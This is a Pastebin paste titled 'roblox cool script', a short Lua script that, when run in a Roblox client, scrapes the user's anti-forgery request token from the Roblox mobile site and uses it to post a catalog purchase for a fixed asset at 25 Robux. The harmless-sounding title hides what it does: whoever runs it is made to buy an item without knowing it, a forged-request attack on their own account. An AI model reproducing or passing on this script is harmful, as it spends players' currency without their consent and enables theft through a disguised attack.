xx_g

roblox cool script

Mar 4th, 2017
127
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.64 KB | None | 0 0
  1. local aid, ct, uaoi, ep = 438800866, 1, 0, 25
  2. local g=function(fr,p,v,r)
  3. c=game:HttpGet('http://m.roblox.com/home', true)
  4. rvt=c:match('<input name="__RequestVerificationToken" type="hidden" value="(.-)">'):match('(.-)" />')
  5. print(('__RequestVerificationToken=' .. rvt .. '&CurrencyType=' .. ct .. '&AssetID=' .. aid .. '&UserAssetOptionID=' .. uaoi .. '&ExpectedPrice=' .. ep))
  6. game:HttpPost('http://m.roblox.com/Catalog/ProcessPurchase', '__RequestVerificationToken=' .. rvt .. '&CurrencyType=' .. ct .. '&AssetID=' .. aid .. '&UserAssetOptionID=' .. uaoi .. '&ExpectedPrice=' .. ep, true, 'application/x-www-form-urlencoded; charset=UTF-8')
  7. end
  8.  
  9. g()
Add Comment
Please, Sign In to add comment